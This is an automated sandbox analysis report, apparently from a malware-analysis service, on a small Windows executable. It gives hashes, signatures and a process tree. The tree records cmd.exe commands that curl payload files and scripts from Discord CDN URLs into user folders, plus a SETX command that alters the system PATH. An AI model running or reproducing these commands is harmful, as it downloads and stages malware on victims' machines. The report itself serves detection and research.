Analysis

  • max time kernel
    120s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20240220-en
  • resource tags

    arch:x64arch:x86image:win7-20240220-enlocale:en-usos:windows7-x64system
  • submitted
    22-05-2024 22:59

General

  • Target

    5273b4cbdbcac4aead01f7895ecef8f0_NeikiAnalytics.exe

  • Size

    14KB

  • MD5

    5273b4cbdbcac4aead01f7895ecef8f0

  • SHA1

    4b9b4f7705d26e32827fcf6b4b1045453fcf4bff

  • SHA256

    f2535bd1ebe93ae17e34bbbd77705f7dc0f3e4c9717e89a63aa50628b05a0396

  • SHA512

    72fbee17fbd245e05e09b36d35a605bc4ae36483e6f2cb96670024a3eb627c200c7bee8f35f2645ea755c03f5de001a86319e5947fa1e06162ff9697bd5a864a

  • SSDEEP

    192:FIzpdC3JYKFj9uyD8bjknN+542TnVabqCm0ME5B72L3W:FIzp+Fj95D8bjknN+eWnUbqCm0dNG3

Score
3/10

Malware Config

Signatures

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 48 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\5273b4cbdbcac4aead01f7895ecef8f0_NeikiAnalytics.exe
    "C:\Users\Admin\AppData\Local\Temp\5273b4cbdbcac4aead01f7895ecef8f0_NeikiAnalytics.exe"
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2644
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c md "%appdata%\Microsoft\CLR Security Config"
      2⤵
        PID:2476
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c curl https://cdn.discordapp.com/attachments/1128679075372867687/1128679774034862190/part_0.bin -o "%appdata%\Microsoft\MS1.bin"
        2⤵
          PID:2572
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c curl https://cdn.discordapp.com/attachments/1128679075372867687/1128693642463293500/protect.bat -o "%userprofile%\cmds\protect.bat"
          2⤵
            PID:2520
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /c curl https://cdn.discordapp.com/attachments/1128679075372867687/1128693642857545948/unprotect.bat -o "%userprofile%\cmds\protect.bat"
            2⤵
              PID:3060
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /c curl https://cdn.discordapp.com/attachments/1128679075372867687/1128679790489129042/part_1.bin -o "%appdata%\Microsoft\MS2.bin"
              2⤵
                PID:2636
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c curl https://cdn.discordapp.com/attachments/1128679075372867687/1128693666526011402/ipuwu.py -o "%userprofile%\cmds\protect.bat"
                2⤵
                  PID:2404
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c SETX /M Path "%PATH%;%userprofile%\cmds"
                  2⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2808
                  • C:\Windows\SysWOW64\setx.exe
                    SETX /M Path "C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Users\Admin\cmds"
                    3⤵
                      PID:2600
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\System32\cmd.exe" /c curl https://cdn.discordapp.com/attachments/1128679075372867687/1128679797472645170/part_2.bin -o "%appdata%\Microsoft\MS3.bin"
                    2⤵
                      PID:2424
                    • C:\Windows\SysWOW64\cmd.exe
                      "C:\Windows\System32\cmd.exe" /c curl https://cdn.discordapp.com/attachments/1128679075372867687/1128679801574662256/part_3.bin -o "%appdata%\Microsoft\MS4.bin"
                      2⤵
                        PID:2388
                      • C:\Windows\SysWOW64\cmd.exe
                        "C:\Windows\System32\cmd.exe" /c curl https://cdn.discordapp.com/attachments/1128679075372867687/1128679696276672512/part_4.bin -o "%appdata%\Microsoft\MS5.bin"
                        2⤵
                          PID:2880
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 2644 -s 1112
                          2⤵
                          • Program crash
                          PID:2168

                      Network

                      MITRE ATT&CK Enterprise v15

                      Replay Monitor

                      Loading Replay Monitor...

                      Downloads

                      • memory/2644-0-0x0000000074D8E000-0x0000000074D8F000-memory.dmp

                        Filesize

                        4KB

                      • memory/2644-1-0x0000000000C20000-0x0000000000C2A000-memory.dmp

                        Filesize

                        40KB